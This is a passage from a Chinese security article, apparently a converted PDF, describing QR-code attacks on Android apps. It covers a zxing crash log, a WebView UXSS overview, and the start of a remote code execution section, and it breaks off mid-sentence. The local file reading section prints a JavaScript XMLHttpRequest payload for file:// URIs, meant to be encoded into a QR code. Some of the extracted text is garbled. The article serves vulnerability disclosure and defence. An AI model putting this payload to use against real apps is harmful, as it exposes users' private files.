android平台下二维码漏洞攻击杂谈- 路人甲.pdfVIP

原⽂地址:/mobile/10775 0x00 前⾔ 现在Android App⼏乎都有⼆维码扫描功能，如果没有考虑到⼆维码可能存在的安全问题，将会导致扫描⼆维码 会受到漏洞攻击，严重的可能导致⼿机被控 制，信息泄漏等风险。 0x01 拒绝服务 低版本的zxing这个⼆维码库在处理畸形⼆维码时存在数组越界，导致拒绝服务。扫描下⾯的⼆维码，可能导致主程序崩溃： 通过程序的崩溃⽇志可以看出是个数组越界： 11-23 10:39:02.535: E/AndroidRuntime(1888): FATAL EXCE TION: Thread-14396 11-23 10:39:02.535: E/AndroidRuntime(1888): rocess: com .xxx, ID: 1888 11-23 10:39:02.535: E/AndroidRuntime(1888): java.lang.ArrayIndexOutOfBoundsException: length=9; index=9 11-23 10:39:02.535: E/AndroidRuntime(1888): at com .mon.BitSource.readBits(Unknown Source) 11-23 10:39:02.535: E/AndroidRuntime(1888): at com .google.zxing.qrcode.decoder.DecodedBitStream arser.decodeAlphanumericSegment(Unknown Source) 11-23 10:39:02.535: E/AndroidRuntime(1888): at com .google.zxing.qrcode.decoder.DecodedBitStream arser.decode(Unknown Source) 11-23 10:39:02.535: E/AndroidRuntime(1888): at com .google.zxing.qrcode.decoder.Decoder.decode(Unknown Source) 11-23 10:39:02.535: E/AndroidRuntime(1888): at com .google.zxing.qrcode.QRCodeReader.decode(Unknown Source) 11-23 10:39:02.535: E/AndroidRuntime(1888): at com .google.zxing.MultiFormatReader.decodeInternal(Unknown Source) 11-23 10:39:02.535: E/AndroidRuntime(1888): at com .google.zxing.MultiFormatReader.decodeWithState(Unknown Source) 0x02 本地⽂件读取 之前Wooyun上爆了⼀个利⽤恶意⼆维码攻击快拍的漏洞，识别出来的⼆维码默认以html形式展⽰(Android+Iphone)，可以执⾏html和js。将下⾯的js在cli.im⽹ 站上⽣成⼆维码： # !js script x=new XMLHttpRequest(); if(x.overrideMimeType) x.overrideMimeType(text/xml); x.open(GET, file://///p, false); x.send(null); alert(x.responseText); /script ⽤快拍扫描之后， 能读取本地⽂件内容： 0x03 UXSS 去年，Android平台上的Webview U SS漏洞被吵的沸沸扬扬，由于低版本的Android系统⾃带的Webview组件使⽤Webkit作为内核，导致Webkit的历史漏洞 存 在于Webview⾥⾯，其中 包括危害⽐较⼤的U SS漏洞。 Webview组件⼏乎存在于所有Android App中，⽤来渲染⽹页。如果扫描⼆维码得到的结果是个⽹址，⼤部分App会直接⽤Webview来打开，由于Webview存在 U SS漏洞，很容易导致资⾦被窃、帐号被盗或者隐私泄露。漏洞介绍可参考TSRC博⽂：Android Webview U SS 漏洞攻防 0x0 远程命令执⾏ ⼤部分Android App扫描⼆维码之后，如果识别到的⼆维码内容是个⽹址时，会直接调⽤Webview来进⾏展⽰。如果Webview导出了js